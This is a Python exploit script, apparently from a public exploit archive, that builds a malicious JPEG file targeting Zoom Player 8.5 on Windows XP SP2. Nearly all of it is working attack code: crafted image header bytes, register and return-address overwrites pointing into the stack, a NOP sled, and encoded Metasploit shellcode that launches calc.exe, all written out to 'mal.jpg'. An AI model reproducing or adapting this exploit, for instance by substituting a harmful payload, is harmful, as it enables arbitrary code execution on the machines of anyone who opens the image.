Inmatrix Ltd. Zoom Player 8.5 Memory Corruption / Code Execution

`# Exploit Title: Inmatrix Ltd. Zoom Player Crafted JPEG File Memory Corruption and Arbitrary Code Execution Exploit.  
# Version: Zoom Player v8.5  
# Date: 09-1-2013  
# Author: Debasish Mandal.  
# Blog : http://www.debasish.in/  
# Software Link: http://www.inmatrix.com/files/zoomplayer_download.shtml  
# Vendor Homepage: http://www.inmatrix.com/  
# Category: Local  
# Tested on: Windows XP SP2.  
# Vendor Patch: This issue is patched and affected version is removed from site.  
# http://forum.inmatrix.com/index.php?showtopic=13904  
  
d = "\xA3\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x01\x00\x60\x00\x60\x00\x00\xFF\xED\x18\x2E\x50\x68\x6F\x74\x6F\x73\x68\x6F\x70\x20\x33\x2E\x30\x00\x38\x42\x49\x4D\x03\xED\x0A\x52\x65\x73\x6F\x6C\x75\x74\x69\x6F\x6E\x00\x00\x00\x00\x10\x00\x60\x00\x00\x00\x01\x00\x01\x00\x60\x00\x00\x00\x01\x00\x01\x38\x42\x49\x4D\x04\x0D\x18\x46\x58\x20\x47\x6C\x6F\x62\x61\x6C\x20\x4C\x69\xE5\x68\x74\x69\x6E\x67\x20\x41\x6E\x67\x6C\x65\x00\x00\x00\x00\x04\x00\x00\x00\x78\x38\x42\x49\x4D\x04\x19\x12\x46\x58\x20\x47\x6C\x6F\x89\x61\x6C\x20\x41\x6C\x74\x69\x74\x75\x64\x65\x00\x00\x00\x00\x04\x00\x00\x00\x1E\x38\x42\x49\x4D\x03\xF3\x0B\x50\x72\x69\x6E\x74\x20\x46\x6C\x61\x67\x73\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x38\x42\x49\x4D\x04\x0A\x0E\x43\x6F\x70\x79\x72\x69\x67\x68\x74\x20\x46\xA7\x61\x67\x00\x00\x00\x00\x01\x00\x00\x38\x42\x49\x4D\x27\x10\x14\x4A\x61\x70\x61\x6E\x65\x73\x65\x20\x50\x72\x69\x6E\x74\x20\x46\x6C\x61\x67\x73\x00\x00\x00\x00\x0A\x00\x01\x00\x00\x00\x39\x00\x00\x00\x02\x38\x42\x49\x4D\x03\xF5\x17\x43\x6F\x6C\x6F\x72\x20\x48\x61\x6C\x66\x74\x6F\x6E\x65\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x00\x00\x48\x00\x2F\x66\x66\x00\x01\x00\x6C\x66\x66\x00\x06\x00\x00\x00\x00\x00\x01\x00\x2F\x66\x66\x00\x01\x00\xA1\x99\x9A\x00\x06\x00\x00\x00\x00\x00\x01\x00\x32\x00\x00\x00\x01\x00\x5A\x00\x00\x00\x06\x00\x00\x00\x00\x68\x01\x00\x35\x00\x00\x00\x01\x00\x2D\x00\x00\x00\x06\x00\x00\x00\x00\xA1\x01\x38\x42\x49\x4D\x03\xF8\x17\x43\x6F\x6C\x6F\x72\x20\x54\x72\x61\x6E\x73\x66\x65\x72\x20\x53\x65\x74\x74\x69\x6E\x67\x73\x00\x00\x00\x70\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xB5\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x9D\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\xE8\x00\x00\x38\x42\x49\x4D\x04\x08\x06\x47\x75\x69\x64\x65\x73\x00\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x02\x40\x00\x00\x02\x40\x00\x00\x00\x00\x38\x42\x49\x45\x04\x1E\x0D\x55\x52\x4C\x20\x6F\x76\x65\x72\x72\x69\x64\x65\x73\x00\x00\x00\x04\x00\x00\x00\x00\x38\x42\x49\x4D\x04\x1A\x06\x53\x6C\x69\x63\x65\x73\x00\x00\x00\x00\x75\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x58\x00\x00\x03\x20\xBC\x00\x00\x0A\x00\x55\x00\x6E\x00\x74\x00\x69\x00\x74\x00\x6C\x00\x65\x00\x64\x00\x2D\x00\x31\x00\x00\x00\x01\x00\x49\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x20\x00\x00\x02\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x42\x49\x4D\x04\x11\x11\x49\x43\x43\x20\x55\x6E\x74\x61\x67\x67\x65\x64\x20\x46\x6C\x61\x67\x00\x00\x00\x01\x01\x00\x38\x42\x49\x4D\x04\x14\x17\x4C\x61\x79\x65\x72\x20\x49\x44\x20\x47\x65\x6E\x65\x72\x15\x74\x6F\x72\x20\x42\x61\x73\x65\x00\x00\x00\x04\x00\x00\x00\x02\x38\x42\x49\x4D\x04\x0C\x15\x4E\x65\x77\x20\x57\x69\x6E\x64\x6F\x77\x73\x20\x54\x8E\x75\x6D\x62\x6E\x61\x69\x6C\x00\x00\x14\x86\x00\x00\x00\x01\x00\x00\x00\x70\x00\x00\x00\x54\x00\x00\x01\x50\x00\x00\x6E\x40\x00\x00\x14\x6A\x00\x18\x00\x01\xFF\xD8\xAE\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x01\x00\x48\x00\x48\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00\x00\x01\xFF\xDB\x00\x84\x00\x0C\x08\x08\x08\x09\x08\x0C\x09\x09\x0C\x11\x0B\x0A\x0B\x11\x15\x0F\x0C\x0C\x0F\x15\x18\x13\x13\x15\x13\x13\x18\x11\x0C\x0C\x0C\x0C\x0C\x0C\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x0D\x0B\x6A\x0D\x0E\x0D\x10\x0E\x0E\x10\x14\x0E\x0E\x0E\x14\x14\x0E\x0E\x0E\x0E\x14\x11\x0C\x0C\x0C\x0C\x0C\x11\x11\x0C\x0C\x0C\x0C\x0C\x0C\x11\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C\xFF\xC0\x00\x11\x08\x00\x54\x00\x70\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01\xFF\xDD\x00\x  
d += "\x86\xf4\x12\x00" #EBX  
d += "\x42"*24 #Padding  
d += "\x86\xf4\x12\x00" #EBX  
d += "\x43"*8 #Padding  
d += "\xA6\xF4\x12\x00" #EIP - > 0012F4A6 on Stack  
d += "\x50"*12 #Padding  
d += "\x86\xf4\x12\x00" #EAX  
d += "\x90"*10 #NOPs  
  
#windows/exec - 227 bytes  
#http://www.metasploit.com  
#Encoder: x86/shikata_ga_nai  
#EXITFUNC=process, CMD=calc.exe, VERBOSE=false  
  
d += ("\xbd\x86\x9f\x31\x9b\xdb\xdf\xd9\x74\x24\xf4\x58\x31\xc9\xb1"  
"\x33\x83\xc0\x04\x31\x68\x0e\x03\xee\x91\xd3\x6e\x12\x45\x9a"  
"\x91\xea\x96\xfd\x18\x0f\xa7\x2f\x7e\x44\x9a\xff\xf4\x08\x17"  
"\x8b\x59\xb8\xac\xf9\x75\xcf\x05\xb7\xa3\xfe\x96\x79\x6c\xac"  
"\x55\x1b\x10\xae\x89\xfb\x29\x61\xdc\xfa\x6e\x9f\x2f\xae\x27"  
"\xd4\x82\x5f\x43\xa8\x1e\x61\x83\xa7\x1f\x19\xa6\x77\xeb\x93"  
"\xa9\xa7\x44\xaf\xe2\x5f\xee\xf7\xd2\x5e\x23\xe4\x2f\x29\x48"  
"\xdf\xc4\xa8\x98\x11\x24\x9b\xe4\xfe\x1b\x14\xe9\xff\x5c\x92"  
"\x12\x8a\x96\xe1\xaf\x8d\x6c\x98\x6b\x1b\x71\x3a\xff\xbb\x51"  
"\xbb\x2c\x5d\x11\xb7\x99\x29\x7d\xdb\x1c\xfd\xf5\xe7\x95\x00"  
"\xda\x6e\xed\x26\xfe\x2b\xb5\x47\xa7\x91\x18\x77\xb7\x7d\xc4"  
"\xdd\xb3\x6f\x11\x67\x9e\xe5\xe4\xe5\xa4\x40\xe6\xf5\xa6\xe2"  
"\x8f\xc4\x2d\x6d\xd7\xd8\xe7\xca\x27\x93\xaa\x7a\xa0\x7a\x3f"  
"\x3f\xad\x7c\x95\x03\xc8\xfe\x1c\xfb\x2f\x1e\x55\xfe\x74\x98"  
"\x85\x72\xe4\x4d\xaa\x21\x05\x44\xc9\xa4\x95\x04\x20\x43\x1e"  
"\xae\x3c")  
raw_input('[*] Press Enter to generate the malicious JPEG file: ')  
f = open('mal.jpg','w')  
f.write(d)  
f.close()  
print "[*] Malicious JPEG File generated Successfully.."  
  
`